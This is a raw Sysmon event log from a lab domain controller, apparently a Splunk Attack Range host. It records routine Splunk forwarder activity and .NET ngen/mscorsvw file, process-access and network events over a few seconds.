23542300x800000000000000018535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:39.316{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AB17CE10CF252AF61DFB58DACA1BEC7,SHA256=AB6A50D0925D6CCCA82CCAB75F8F3BE1EF05284210C43C21E009535EBACF1816,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:39.035{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:39.073{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61359-false10.0.1.12-8089- 23542300x800000000000000018536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:40.332{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4497A6492158D682B6BE93FD8D5EB78A,SHA256=41AE4C19BC0303BA238CF783035346DB0ECC41204DC299D28F489D6FD218EF19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:41.347{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1A49F49F5A559F102287448CABD34C0,SHA256=0CEBAABEFEEEABCF2A0AEB428520A83DEE37DD8EF4C4D5F7AEBF27041CA0C593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:42.800{4DB9351A-A0EF-60D3-4502-00000000CF01}6812NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C4GKG9DZH0\System.Data.Entity.ni.dll.auxMD5=0E0C7B4217E13E5BE6A91594D75B6C95,SHA256=6362BDB002908DD0F32DE752232FCB577A47883B8555A9B739AB41C6BA27F916,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:42.800{4DB9351A-A0EF-60D3-4502-00000000CF01}6812NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C4GKG9DZH0\System.Data.Entity.ni.dllMD5=E65BA76FB53892CAA894703A9A0ADF08,SHA256=D609D1847F3940DCEF413B6828A49F66C44B09BDA93DC5E79C92ED1924498899,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:42.394{4DB9351A-A0EF-60D3-4502-00000000CF01}6812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a9c-0\System.Data.Entity.dll2021-06-23 21:00:42.394 23542300x800000000000000018539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:42.363{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3CBEC21BD22134A98FF41FF383E2D51,SHA256=9EEDC3D10496F52AE3BE5C305585A433BE7EEBD1DB041936C1A888C047A15016,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.629{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A0FB-60D3-4702-00000000CF01}6564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.613{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A0FB-60D3-4702-00000000CF01}6564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.613{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A0FB-60D3-4702-00000000CF01}6564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.363{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3661682BA04427990D4662B2B4C7B0D2,SHA256=FBCF54972B28BEAFD1A8C62A6D5552C08D1EDFDCD631C346E1EF3CF366DF732D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.160{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A0FB-60D3-4602-00000000CF01}5536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.144{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A0FB-60D3-4602-00000000CF01}5536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.144{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A0FB-60D3-4602-00000000CF01}5536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.769{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A0FC-60D3-4802-00000000CF01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.754{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A0FC-60D3-4802-00000000CF01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.754{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A0FC-60D3-4802-00000000CF01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000018556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:43.104{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61360-false10.0.1.12-8000- 23542300x800000000000000018555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.675{4DB9351A-A0FB-60D3-4702-00000000CF01}6564NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\N87OXRZWDU\System.Data.Entity.Design.ni.dll.auxMD5=D78AE825E336E1D8B522F3ACB791B74E,SHA256=E3FABB3797D2EE3D42CE663D2CBA131382EBE46CC53ABF05F7B1E75D752DDC79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.675{4DB9351A-A0FB-60D3-4702-00000000CF01}6564NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\N87OXRZWDU\System.Data.Entity.Design.ni.dllMD5=9543189BB0D9B15F665FAEE34208B1D9,SHA256=7665A9266FDA3EB5E55B25DD5E037E339F3AA56369510BC48EE2EEE88DB8FC65,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:44.629{4DB9351A-A0FB-60D3-4702-00000000CF01}6564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\19a4-0\System.Data.Entity.Design.dll2021-06-23 21:00:44.629 23542300x800000000000000018552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.379{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=317A976E8B9A9105B7F32BB6D5BCA1EA,SHA256=123441389CA377842561B191B263C0C65D10B28A8CFB6B978460C9330DB518D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.175{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5801CEB5824A9CA0F7789A9C56A43F34,SHA256=99DD7844D2215EE0053FD375F20CC2A1A233B9B4867664B3B03FCB7815F1796C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:44.175{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=595830EB35F9648961AAA4A7F07610E9,SHA256=707FDE8F2E0823FEB1F1D0A99DEE931FD198FC9BA5066747CF812FD58B98C307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:45.847{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5801CEB5824A9CA0F7789A9C56A43F34,SHA256=99DD7844D2215EE0053FD375F20CC2A1A233B9B4867664B3B03FCB7815F1796C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:45.472{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=125F0210806F0AA3AFB749AC031EAC4F,SHA256=10B6B77129EF03A6DEABF3827AEE54EEBCFA7D68E7E9365B1746C8BD9C18F762,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:45.050{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A0FD-60D3-4902-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:45.035{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A0FD-60D3-4902-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:45.035{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A0FD-60D3-4902-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:46.707{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33AC490E747D6A33D6368A1ED50742BC,SHA256=F06EEE38ECACD0C306CA3288BACD60BC3D788D15D42ECFA976206765F4381FEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.738{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01E0A1FC92E1FC1EE38EA2BF31676B9D,SHA256=3D99EF2A0E9DEA5B4BF7525AF7C6C43C2AE428E91B025CEB854A588C6059FE64,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.519{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A0FF-60D3-4B02-00000000CF01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.519{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A0FF-60D3-4B02-00000000CF01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.519{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A0FF-60D3-4B02-00000000CF01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.332{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A0FF-60D3-4A02-00000000CF01}6644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ec